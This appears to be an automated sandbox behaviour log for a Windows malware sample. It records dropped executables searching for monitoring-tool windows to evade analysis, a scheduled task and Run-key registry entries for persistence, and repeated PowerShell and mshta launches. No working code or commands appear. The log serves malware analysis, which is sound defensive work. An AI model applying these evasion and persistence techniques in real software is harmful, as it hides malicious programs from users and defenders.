Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Source: C:\Users\user\DocumentsECAFHIIJJE.exe

File created: C:\Windows\Tasks\skotes.job

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4136f86ac7.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4136f86ac7.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3160604f40.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3160604f40.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0ac2a0f3ae.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0ac2a0f3ae.exe

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6855F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_6C6855F0

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
